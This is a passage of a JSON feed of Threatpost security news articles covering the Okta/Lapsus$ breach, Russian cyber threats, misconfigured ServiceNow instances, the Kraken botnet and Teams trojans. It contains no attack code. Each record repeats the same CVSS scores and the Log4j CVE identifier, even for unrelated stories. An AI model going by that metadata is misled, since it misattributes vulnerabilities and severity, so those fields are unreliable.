firm.\u201d\n\nAccording to the full report that Sitel commissioned, the threat actor had access to Sitel\u2019s systems for a five-day window, from Jan. 16-21: dates that back up the screenshots that Lapsus$ posted on March 21. \n\nDuring the five-day window wherein it had access to Sitel, the attacker\u2019s only action was the attempted password reset.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/28140124/Screen-Shot-2022-03-28-at-1.59.44-PM-1-e1648490538671.png>)\n\nTimeline of Okta hack. Source: Okta.\n\n## How Okta Screwed Up\n\nAs far as why Okta didn\u2019t notify customers when it learned of the ATO attack in January, it acknowledged on Friday that \u201cwe made a mistake.\u201d \n\n\u201cSitel is our service provider for which we are ultimately responsible,\u201d it admitted in the Friday FAQ. \n\nYou can\u2019t know what you don\u2019t know, though: \u201cIn January, we did not know the extent of the Sitel issue \u2013 only that we detected and prevented an account takeover attempt and that Sitel had retained a third party forensic firm to investigate,\u201d Okta said. \u201cAt that time, we didn\u2019t recognize that there was a risk to Okta and our customers. We should have more actively and forcefully compelled information from Sitel.\u201d\n\nCoulda, woulda, should, it said: \u201cIn light of the evidence that we have gathered in the last week, it is clear that we would have made a different decision if we had been in possession of all of the facts that we have today.\u201d\n\nIt must be a painful mea culpa: Okta\u2019s share price had dropped nearly15 percent as of Friday. As the Wall Street Journal [reported](<https://www.wsj.com/articles/okta-faces-long-road-back-11648211400>), that\u2019s a common reaction after major cyber attacks, such as those at SolarWinds, Mimecast and Mandiant, all of which saw shares slide after they reported their own incidents. \n\nThe WSJ\u2019s headlines say it all: \u201cIdentity-management company has strong market position, but business impact of recent hack won\u2019t be clear for a while,\u201d the business daily said on Friday, predicting that \u201d Okta Faces Long Road Back.\u201d \n\n## Potential Extent of Compromise\n\nIn its Friday FAQ, Okta said that, as detailed in[ its blog](<https://www.okta.com/blog/2022/03/oktas-investigation-of-the-january-2022-compromise/>), the company has already identified and contacted 366 potentially affected customers. Okta service itself was not breached, it said: \u201cThere is no impact to Auth0 or AtSpoke customers, and there is no impact to HIPAA and FedRAMP customers.\u201d\n\nAs such, customers don\u2019t have to reset passwords, Okta said: \u201cWe are confident in our conclusions that the Okta service has not been breached and there are no corrective actions that need to be taken by our customers.\n\n\u201cWe are confident in this conclusion because Sitel (and therefore the threat actor who only had the access that Sitel had) was unable to create or delete users, or download customer databases.\u201d\n\nThat lack of access is by design, Okta explained. \u201cIn assessing the potential extent of the compromise, it is important to remember that by design, Sitel\u2019s support engineers have limited access. They are unable to create or delete users, or download customer databases. Support engineers are able to facilitate the resetting of passwords and multi-factor authentication factors for users, but are unable to choose those passwords. In other words, an individual with this level of access could repeatedly trigger a password reset for users, but would not be able to log in to the service.\u201d\n\nBesides its attack on Okta, the precocious Lapsus$ gang \u2013 a group of data extortionists potentially [thinned out](<https://threatpost.com/uk-cops-collar-7-suspected-lapsus-gang-members/179098/>) by London police having collared seven suspected members last week \u2013 also posted some of Microsoft\u2019s source code and data about internal projects and systems around the same time as it shared Okta screenshots.\n\n## How Much Should We Blame Okta?\n\nSecurity specialists aren\u2019t jumping to blame Okta for its admitted \u201cmistake.\u201d The thinking: There but for the grace of God go us. \n\nAfter all, ATOs are common. How should an organization know which ones to consider as worthy of close inspection, and when should they follow up with a deeper dive to ensure the attempt wasn\u2019t successful? \n\nSounil Yu, chief information security officer at JupiterOne \u2013 provider of cyber asset management and governance technology \u2013 told Threatpost on Monday that these intrusions (or, rather, attempted intrusions, as the case may be) occur regularly, but the \u201cvast majority\u201d are beaten back before they have a serious impact or lead to further incidents.\n\n\u201cIt\u2019s easy in hindsight to understand the true severity of an incident, but hard in the present time,\u201d he said via email. \n\nChris Morgan, senior cyber threat intelligence analyst at digital risk protection firm Digital Shadows, explained that ATOs are \u201cincredibly common\u201d due to a combination of the effectiveness and availability of brute-force cracking tools and threat actors\u2019 ability to sell stolen accounts on cybercriminal forums. \n\n## What Should Trigger a Report?\n\nThe question of whether certain incidents are material enough to report \u201ccan be more art than science,\u201d Yu said. But the Okta case will probably cause many organizations to reconsider what ratings and thresholds they\u2019re applying to such incidents, he surmised, \u201cso that we are not seen as negligent in meeting our reporting obligations.\u201d\n\nKnowing when to conduct a more robust investigation depends on what facts are uncovered during the incident management process, along with the risk associated with the targeted account, Morgan said via email. \u201cAn account with significant privileges should be treated with a higher priority than those that [have] limited functionality,\u201d he advised.\n\nInitial triage of ATO attacks aim to identify key facts over what activity the account has been involved in, to accurately determine the risk and next steps, Morgan said. \u201cThis is typically done by checking authentication logs and observing login activity and includes spotting whether the account has attempted to login to additional services, changed any passwords, or downloaded external material.\u201d he continued. \u201cIt also includes activity that may have an impact on the overall risk, like whether the account has accessed sensitive data or attempted to establish persistence.\u201d\n\n## No \u2018God-like Access\u201d Was Gained\n\nWhen the Okta breach first came to light, there was concern about a \u201csuperuser\u201d app pictured in Lapsus$ screenshots. Okta clarified on Friday that this was no \u201cSuper Admin\u201d account, as had been feared initially. Rather, it\u2019s an in-house application \u2013 known as SuperUser or SU \u2013 used by support staff to handle most queries. \n\n\u201cThis does not provide \u201cgod-like access\u201d to all its users,\u201d Okta Chief Security Officer David Bradbury explained. \u201cThis is an application built with least privilege in mind to ensure that support engineers are granted only the specific access they require to perform their roles.\u201d\n\nSpecifically, SuperUser engineers can\u2019t create or delete users or download customer databases. \n\nWhat SuperUsers can do: \u201cSupport engineers do have access to limited data \u2013 for example, Jira tickets and lists of users \u2013 that were seen in the screenshots,\u201d Bradbury clarified. \u201cSupport engineers are also able to facilitate the resetting of passwords and MFA factors for users, but are unable to obtain those passwords.\u201d\n\nThe fact that the Sitel account Lapsus$ took over was reportedly built with the principle of least privilege in mind \u201cshould have minimized the data and services that Lapsus$ were able to view,\u201d Morgan said, in response to Threatpost asking what Okta did right. \n\n\u201cOkta should also be praised for how quickly they identified and worked to lock down the compromised account,\u201d he added. \n\nHowever, clearly, that timeliness didn\u2019t extend to the forensic reporting and communication of the incident, as Okta itself has now admitted. \n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T18:28:34", "type": "threatpost", "title": "Okta Says It Goofed in Handling the Lapsus$ Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-28T18:28:34", "id": "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "href": "https://threatpost.com/okta-goofed-lapsus-attack/179129/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-22T16:34:37", "description": "The Russian government is exploring \u201coptions for potential cyberattacks\u201d on critical infrastructure in the U.S., the White House warned on Monday, in retaliation for sanctions and other punishments as the war in Ukraine grinds on.\n\nOfficials said that its latest intelligence shows cyber-related \u201cpreparatory activity\u201d on the part of President Vladimir Putin\u2019s government, though White House deputy national security adviser for cyber and emerging technology Anne Neuberger emphasized that no concrete threat has been identified.\n\n\u201cTo be clear, there is no certainty there will be a cyber-incident on critical infrastructure,\u201d she told reporters [during a briefing](<https://thehill.com/homenews/administration/599072-white-house-warns-russia-prepping-possible-cyberattacks-on-us?rl=1>). She added, \u201cThere is no evidence of any specific cyberattack that we are anticipating. There is some preparatory activity that we\u2019re seeing and that is what we shared in a classified context with companies who we thought might be affected.\u201d\n\nThat observed prep work includes vulnerability scanning and website probing, she added, declining to add any specifics. She noted that officials were holding more detailed classified briefings with organizations they believe could be targeted.\n\n\u201cThe current conflict has put cybersecurity initiatives in hyperdrive, and today, industry leaders aren\u2019t just concerned about adversaries breaching critical infrastructure but losing access and control to them,\u201d Saket Modi, co-founder and CEO at Safe Security, said via email.\n\nIn tandem with the briefing, the White House released a cyber-preparedness fact sheet, and President Joe Biden [issued the following statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/statement-by-president-biden-on-our-nations-cybersecurity/>):\n\n_\u201cI have previously warned about the potential that Russia could conduct malicious cyber activity against the United States, including as a response to the unprecedented economic costs we\u2019ve imposed on Russia alongside our allies and partners. It\u2019s part of Russia\u2019s playbook. Today, my Administration is reiterating those warnings based on evolving intelligence that the Russian Government is exploring options for potential cyberattacks.\u201d_\n\nThe [fact sheet](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/fact-sheet-act-now-to-protect-against-potential-cyberattacks/>) contains basic advice for hardening cyber-defenses, including employee awareness education; implementing multifactor authentication; keeping patching up-to-date; ensuring backups for data; turning on encryption; red-team exercises; and updating security tools.\n\n\u201cThis is a call to action and a call to responsibility for all of us,\u201d Neuberger said, again citing a \u201cpotential shift in intention\u201d by Russia.\n\n## **Organizations Are Not Prepared for Russian Attacks**\n\nJason Rebholz, CISO at Corvus Insurance, noted that basic cyber-hardening should have begun long ago.\n\n\u201cThe White House\u2019s best practices echo security fundamentals \u2013 something every organization should strive for,\u201d he said via email. \u201cFor many organizations, the time to implement was several years ago, as the frequency and severity of attacks began to escalate. Like planting a tree, the best time to secure your organization was ten years ago. The next best time is today. Organizations that have not addressed the key items and hardened their cyber-defenses are at a significantly greater risk of compromise.\u201d\n\nBeyond the basics, there are other challenges in being prepared for an onslaught from Russia\u2019s [considerable cyber-arsenal](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>), Modi said.\n\n\u201cWhile governments and businesses have started pivoting towards proactive cybersecurity, it is difficult to do so without addressing the three major challenges in cybersecurity that organizations face,\u201d he explained. \u201cThere are too many cybersecurity products that do not communicate with each other, and this siloed approach leads to managing cybersecurity reactively. Finally, despite increased attention on the need for a better disclosure mechanism of cyberattacks, cybersecurity communication continues to be a challenge since it often lacks a business context.\u201d\n\nMeanwhile, Danny Lopez, CEO at Glasswall, pointed out that the real risk involves zero-day exploits and other unknown threats.\n\n\u201cPutin is playing a long game. War is costly both in terms of human and economic terms. If we see a de-escalation of the situation on the ground, we are likely to see an escalation of cyber warfare,\u201d he told Threatpost. \u201cThere are no patches for [unknown zero-day] and they wreak havoc within hours, whilst the security services and technology industry tries to catch up. These are extremely dangerous to governments as well as businesses.\u201d\n\nThe bottom line is that organizations should assume that attacks are imminent, researchers concluded.\n\n\u201cIt is a confusing time that involves two nations that have historically possessed and demonstrated very good skills in the cybersecurity and cybercrime areas,\u201d noted Purandar Das, co-founder and CEO at Sotero, via email. \u201cCountries under duress have and will utilize cyberattacks as a way to retaliate and to get around sanctions. The U.S. being the face of such sanctions and a history of poorly protected infrastructure make it a tempting target. Add all this together and the warnings make a lot of sense.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-22T16:31:18", "type": "threatpost", "title": "Russia Lays Groundwork for Cyberattacks on U.S. Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-22T16:31:18", "id": "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "href": "https://threatpost.com/russia-cyberattacks-us-infrastructure/179037/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T17:12:22", "description": "Nearly 70 percent of instances of the software-as-a-service (SaaS) platform ServiceNow Customers aren\u2019t locking down access correctly, leading to ~70 percent of ServiceNow implementations tested by AppOmni being potentially exposed to the public.\n\nServiceNow is a $4.5 billion company whose software helps enterprises with their digital workflows. According to a [report](<https://appomni.com/resources/aolabs/appomni-discovers-security-misconfiguration-impacting-servicenow/>) published Wednesday by AppOmni, more than 20,000 companies use the platform.\n\nThe cause of all the exposure, the report stated, is \u201ca combination of customer-managed ServiceNow ACL configurations and overprovisioning of permissions to guest users.\u201d ACLs \u2013 access control lists \u2013 track permissions in an IT environment.\n\nExposed instances \u201cmay be utilized by a malicious actor to extract data from records,\u201d Offensive Security Researcher Aaron Costello wrote in the report.\n\n## Human Error Leads to Data Exposure\n\nOrganizations typically use role-based access controls (RBAC) to determine who can access what resources within a system. Users can see and possibly interact with whatever is relevant to them and are barred from whatever isn\u2019t.\n\nFor public-facing companies, the general public plays into the RBAC picture. \u201cOne important aspect of RBAC,\u201d the report noted, \u201cis the ability to allow public access to information within your \u2018database,\u2019 which could be a forum, online shop, customer support site, or knowledge base. The challenge is ensuring the right level of access when organizations update or customize SaaS applications or onboard new users.\u201d\n\nThus, what researchers have discovered is not so much a flaw in ServiceNow as an oversight made by customers. \u201cMisconfigurations are common across major SaaS platforms,\u201d wrote the researchers, \u201cdue to the complexity that inevitably comes with high levels of SaaS functionality, flexibility, and extensibility. Misconfigurations can happen during the initial implementation phase of a SaaS platform, when users or settings change, or as part of the regular cadence of SaaS updates that can impact current configurations.\u201d\n\nThe researchers found that nearly 70 percent of ServiceNow instances tested by AppOmni were misconfigured, introducing the possibility that unauthorized users could steal sensitive information from enterprises that may not even realize they\u2019re vulnerable.\n\n## Why SaaS is So Often Insecure\n\nBecause SaaS platforms are so prevalent, and so interconnected with business processes \u2013 and with one another \u2013 they tend to be some of the most high-value and highly vulnerable software in the world. They \u201chave vastly increased the attack surface,\u201d Sounil Yu, CISO and head of research at JupiterOne, [wrote](<https://threatpost.com/supply-chain-pain-and-changing-security-roles/177058/>) for Threatpost in December. \u201cThey\u2019re ripe for exploitation due to mass adoption across many organizations. This enables attackers to concentrate their efforts on a handful of SaaS providers to simultaneously impact large numbers of their customers.\u201d\n\nTypically, SaaS products come with security features like encryption and single-sign-on authentication. But features aren\u2019t enough when human error is involved. \u201cSecuring SaaS is a lot more complicated than just checking a handful of settings or enabling strong authentication for users,\u201d said Brendan O\u2019Connor, CEO and co-founder of AppOmni, in a statement.\n\nAnd so, to protect against RBAC misconfiguration, the report advised that administrators review the following:\n\n * ACLs that are absent of conditional and script based access evaluation, which have either no role, or the public role, assigned to them.\n * User criteria and the resources to which those criteria are granting access. Focus on any UC in which the \u201cGuest\u201d user is assigned to or contains the\u201d\u2018public'\u201drole.\n * Resources that can be directly assigned the \u201cpublic\u201d role to grant access, or indirectly made accessible to the public through another mechanism.\n * And, finally, system properties that may dictate access to records through a provided role or list of roles.\n\nLuckily there\u2019s no fundamental, inescapable flaw in ServiceNow software. So long as admins diligently review their configurations, enterprises should remain safe from this particular harm.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T16:00:32", "type": "threatpost", "title": "Most ServiceNow Instances Misconfigured, Exposed", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T16:00:32", "id": "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "href": "https://threatpost.com/most-servicenow-instances-misconfigured-exposed/178827/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:38", "description": "There\u2019s a new, still-under-development, [Golang](<https://threatpost.com/golang-cryptomining-worm-speed-boost/168456/>)-based botnet called Kraken with a level of brawn that belies its youth: It\u2019s using the [SmokeLoader](<https://threatpost.com/new-loader-variant-behind-widespread-malware-attacks/146683/>) malware loader to spread like wildfire and is already raking in a tidy USD $3,000/month for its operators, researchers report.\n\nThough its name may sound familiar, Kraken has little to do with the [2008 botnet](<https://www.theregister.com/2008/04/07/kraken_botnet_menace/>) of the same name, [wrote](<https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/>) ZeroFox threat researcher Stephan Simon in a Wednesday post.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nUsing SmokeLoader to install yet more malicious software on targeted machines, Kraken is picking up hundreds of new bots each time a new command-and-control (C2) server is deployed, according to Simon\u2019s post.\n\nZeroFox came upon the previously unknown botnet, which was still under active development, in late October 2021. Even though it was still being developed, it already had the ability to siphon sensitive data from Windows hosts, being able to to download and execute secondary payloads, run shell commands, and take screenshots of the victim\u2019s system, ZeroFox said.\n\n## Simple, But Multi-Tentacled\n\nZeroFox shared a screen capture of the initial version of Kraken\u2019s panel \u2013 shown below, the C2 was named \u201cKraken Panel\u201d \u2013 that\u2019s lean in features. It offered basic statistics, links to download payloads, an option to upload new payloads, and a way to interact with a specific number of bots.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/17113451/Krakens-C2-panel-e1645115709526.jpeg>)\n\nEnglish-translated version of the Kraken C2 panel. Source: ZeroFox Intelligence.\n\n\u201cThis version did not appear to allow the operator(s) to choose which victims to interact with,\u201d Simon noted.\n\nBut the current version of Kraken\u2019s C2 panel, shown below, has been completely redesigned and renamed as Anubis. \u201cThe Anubis Panel provides far more information to the operator(s) than the original Kraken Panel,\u201d according to Simon. \u201cIn addition to the previously provided statistics, it is now possible to view command history and information about the victim.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/17114005/Anubis-panel-for-Kraken-e1645116023649.jpeg>)\n\nDashboard for Kraken\u2019s latest C2 panel, called Anubis. Source: ZeroFox Intelligence.\n\n## Grabbing Cryptocurrency\n\nKraken\u2019s author has been tinkering, adding and deleting capabilities. At this point, Kraken can maintain persistence, collect information about the host, download and execute files, run shell commands, take screenshots, and steal various cryptocurrency wallets, including Zcash, Armory, Atomic, Bytecoin, Electrum, Ethereum, Exodus, Guarda and Jaxx Liberty.\n\nLater iterations have gotten yet more replete, with the author having added selective choosing of targets for commands (individually or by group, as opposed to the earlier version having only allowed a bot operator to choose how many victims they\u2019re targeting), task and command history, task ID, command being sent, how many victims the command should be sent to, the targeted geolocation, and a timestamp of when the task was initiated.\n\nAt first, from October to December 2021, the RedLine infostealer was inflicted on victims\u2019 machines every time Kraken struck. RedLine, an increasingly [prevalent](<https://threatpost.com/google-ppc-ads-used-to-deliver-infostealers/166644/>) infostealer, swipes data from browsers, such as saved credentials, autocomplete data and credit card information.\n\nThe malware has since spread its tentacles, though, both in terms of adding other infostealers to the mix and making its operators a boatload of dough. \u201cAs the operator(s) behind Kraken continued to expand and gather more victims, ZeroFox began observing other generic information stealers and cryptocurrency miners being deployed,\u201d according to Simon\u2019s writeup.\n\nAs of Wednesday, the botnet was pulling in around USD $3,000 every month, as shown in the screen capture below from Ethermine.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/17120117/mining_stats-e1645117292604.jpg>)\n\nMining statistics from the cryptocurrency mining pool Ethermine. Source: ZeroFox Intelligence.\n\nWhat does the operator plan to do with the new bot and all the data its infostealers are sucking up? It\u2019s unknown at this point, ZeroFox researchers concluded: \u201cIt is currently unknown what the operator intends to do with the stolen credentials that have been collected or what the end goal is for creating this new botnet.\u201d\n\n## Steering Clear\n\nZeroFox passed on these recommendations to keep Kraken from tangling up your systems:\n\n * Ensure antivirus and intrusion detection software is up to date with all patches and rule sets.\n * Enable two-factor authentication for all organizational accounts to help mitigate phishing and credential stuffing attacks.\n * Maintain regularly scheduled backup routines, including off-site storage and integrity checks.\n * Avoid opening unsolicited attachments and never click suspicious links.\n * Log and monitor all administrative actions as much as possible. Alert on any suspicious activity.\n * Review network logs for potential signs of compromise and data egress.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T17:28:02", "type": "threatpost", "title": "Baby Golang-Based Botnet Already Pulling in $3K/Month for Operators", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T17:28:02", "id": "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "href": "https://threatpost.com/golang-botnet-pulling-in-3k-month/178509/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:44", "description": "Threat actors are targeting Microsoft Teams users by planting malicious documents in chat threads that execute Trojans that ultimately can take over end-user machines, researchers have found.\n\nIn January, researchers at Avanan, a Check Point Company, began tracking the campaign, which drops malicious executable files in Teams conversations that, when clicked on, eventually take over the user\u2019s computer, according to [a report](<https://www.avanan.com/blog/hackers-attach-malicious-.exe-files-to-teams-conversations>) published Thursday.\n\n\u201cUsing an executable file, or a file that contains instructions for the system to execute, hackers can install DLL files and allow the program to self-administer and take control over the computer,\u201d cybersecurity researcher and analyst at Avanan Jeremy Fuchs wrote in a report. \u201cBy attaching the file to a Teams attack, hackers have found a new way to easily target millions of users.\u201d\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nCybercriminals long have targeted Microsoft\u2019s ubiquitous document-creation and sharing suite \u2013 the legacy Office and its cloud-based version, [Office 365](<https://threatpost.com/tiny-font-size-email-filters-bec-phishing/176198/>) \u2013 with attacks against individual apps in the suite such as [PowerPoint](<https://threatpost.com/powerpoint-abused-take-over-computers/178182/>) as well as [business email compromise](<https://threatpost.com/microsoft-365-bec-innovation/163508/>) and other scams.\n\nNow Microsoft Teams \u2013 a business communication and collaboration suite \u2013 is emerging as an [increasingly popular attack surface](<https://threatpost.com/microsoft-teams-phishing-office-365/160458/>) for cybercriminals, Fuchs said.\n\nThis interest could be attributed to its surge in use over the COVID-19 pandemic, as many organization\u2019s employees working remotely relied on the app to collaborate. Indeed, the number of daily active users of Teams [nearly doubled](<blank>) over the past year, increasing from 75 million users in April 2020 to 145 million as of the second quarter of 2021, according to Statista.\n\nThe latest campaign against Teams demonstrates an increased understanding of the collaboration app that will allow attacks against it to increase in both sophistication and volume, Fuchs noted. \u201cAs Teams usage continues to increase, Avanan expects a significant increase in these sorts of attacks,\u201d he wrote.\n\n## **Taking on Teams**** **\n\nIn order to plant malicious documents in Teams, researchers first have to get access to the application, Fuchs noted. This is possible in a number of ways, typically involving an initial [email compromise](<https://threatpost.com/microsoft-teams-tabs-bec/166909/>) through phishing to gain credentials or other access to a network, he said.\n\n\u201cThey can compromise a partner organization and listen in on inter-organizational chats,\u201d Fuchs wrote. \u201cThey can compromise an email address and use that to access Teams. They can steal Microsoft 365 credentials, giving them carte blanche access to Teams and the rest of the Office suite.\u201d\n\nOnce an attacker gains access to Teams, it\u2019s fairly easy to navigate and slip past any security protections, he noted. This is because \u201cdefault Teams protections are lacking, as scanning for malicious links and files is limited,\u201d and \u201cmany email security solutions do not offer robust protection for Teams,\u201d Fuchs wrote.\n\nAnother reason Teams is easy for hackers to compromise is that end users inherently trust the platform, sharing sensitive and even confidential data with abandon while using it, he said.\n\n\u201cFor example, an Avanan analysis of hospitals that use Teams found that doctors share patient medical information practically with no limits on the Teams platform,\u201d Fuchs wrote. \u201cMedical staff generally know the security rules and risk of sharing information via email, but ignore those when it comes to Teams. In their mind, everything can be sent on Teams.\u201d\n\nFurther, nearly every Teams user can invite people from other departments or other companies to collaborate via the platform, and there is often \u201cminimal oversight\u201d over these requests because of the trust people have, he added.\n\n## **Specific Attack Vector**\n\nIn the attack vector Avanan researchers observed, attackers first access Teams through one of the aforementioned ways, such as a phishing email that spoofs a user, or through a lateral attack on the network.\n\nThen, the threat actor attaches a .exe file to a chat \u2013 called \u201cUser Centric\u201d \u2013 that is actually a trojan. To the end user, it looks legitimate, because it appears to be coming from a trusted user.\n\n\u201cWhen someone attaches a file to a Teams chat, particularly with the innocuous-sounding file name of \u2018User Centric,\u2019 many users won\u2019t think twice and will click on it,\u201d Fuchs wrote.\n\nIf that happens, the executable will then install DLL files that install malware as a Windows program and create shortcut links to self-administer on the victim\u2019s machine, he said. The ultimate goal of the malware is to take over control of the machine and perform other nefarious activities.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T14:11:48", "type": "threatpost", "title": "Microsoft Teams Targeted With Takeover Trojans", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T14:11:48", "id": "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "href": "https://threatpost.com/microsoft-teams-targeted-takeover-trojans/178497/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:54", "description": "On Tuesday, institutions central to Ukraine\u2019s military and economy were hit with a wave of denial-of-service (DoS) attacks, which sparked an avalanche of headlines around the world. The strike itself had limited impact \u2014 but the larger implications for critical infrastructure beyond the Ukraine are worth noting, researchers said.\n\nThe targets were core entities to Ukraine: the Armed Forces of Ukraine, the Ministry of Defense, Oschadbank (the State Savings Bank) and Privatbank, the country\u2019s 